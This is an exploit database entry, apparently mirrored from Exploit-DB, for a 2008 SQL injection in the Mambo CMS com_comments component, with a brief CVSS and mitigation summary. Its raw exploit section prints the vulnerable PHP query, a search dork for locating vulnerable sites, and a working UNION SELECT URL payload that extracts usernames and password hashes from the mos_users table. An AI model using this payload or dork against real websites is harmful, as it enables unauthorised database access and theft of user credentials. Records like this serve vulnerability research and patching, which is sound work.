Mambo SQL Injection (com_comments)

vendor:

Mambo

by:

CheebaHawk215

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mambo

Affected Version From: <= 0.5.8.5g

Affected Version To: <= 0.5.8.5g

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mambo SQL Injection (com_comments)

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to access the database and execute arbitrary SQL commands.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################
##
##  Mambo SQL Injection (com_comments)
##
##	Version Affected:  <=  0.5.8.5g
##  Author: CheebaHawk215
##  Home page: http://www.always420forum.com
##
#########################################################
##
## 	Dork: "Review Script", "Phil Taylor"
##
#########################################################
##	
##	Vulnerable Code:
##
##########################################################


$pt_query = "SELECT * FROM mos_content_comments where articleid=$id AND published=1 order by id DESC";


#########################################################
##
##   Exploit:
##
#########################################################


http://site.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1



## This is my first exploit!
## thanks to all who came before me, and enabled me to learn from their efforts!

# milw0rm.com [2008-02-09]